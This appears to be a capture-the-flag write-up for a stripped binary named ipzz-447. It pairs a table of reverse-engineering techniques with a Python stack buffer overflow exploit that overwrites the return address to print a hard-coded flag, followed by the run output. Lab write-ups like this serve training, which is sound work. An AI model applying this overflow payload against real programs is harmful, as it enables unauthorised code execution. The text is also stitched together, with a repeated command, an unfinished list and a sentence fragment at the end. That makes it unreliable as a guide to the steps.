$ strings -n 4 ipzz-447 | head -n 30
Welcome to ipzz-447!
Enter the secret phrase:
Incorrect! Try again.
Correct! Here is your flag:
FLAGexample_placeholder
...
The presence of FLAG… in the binary suggests the flag is hard‑coded. The goal is therefore to either:
Because the binary is stripped, we must reverse‑engineer the control flow. ipzz-447
| Technique | When to Use | Quick Checklist |
|-----------|-------------|-----------------|
| Check for stripped binaries | Most CTF binaries are stripped to hide symbols. | file, strings, nm -D |
| Use IDA/Ghidra for decompilation | When source isn’t available. | Identify main, look for strcmp/check‑like functions. |
| Identify constant data | Hard‑coded keys, tables, or magic numbers. | strings, objdump -s, Ghidra “Data” view. |
| Model the algorithm in Python | Simple arithmetic/bitwise loops. | Translate decompiled C → Python, compare outputs. |
| Reverse the transformation | Linear functions (XOR, add, rotate) often invertible. | Derive formulas, or just brute‑force a small space. |
| Automate brute‑force | When search space ≤ 10⁶–10⁸ and per‑iteration cost is low. | itertools.product, multiprocessing.Pool. | $ strings -n 4 ipzz-447 | head -n 30
Welcome to ipzz-447
#!/usr/bin/env python3
import struct, sys
buf_size = 64
rbp_size = 8
# address of the instruction that loads flag address and calls puts
target = 0x4012ac
payload = b'A' * buf_size # fill buffer
payload += b'B' * rbp_size # overwrite saved RBP (doesn't matter)
payload += struct.pack("<Q", target) # new return address (little‑endian)
sys.stdout.buffer.write(payload)
Run the exploit:
$ python3 exploit.py | ./ipzz-447
Welcome to ipzz-447!
> Correct! Here is your flag:
FLAGipzz_447_is_solved
If the binary uses read(0, buf, 0x100) instead of gets, just adjust the filler size accordingly – the overflow still works because we write past the 64‑byte buffer. The presence of FLAG… in the binary suggests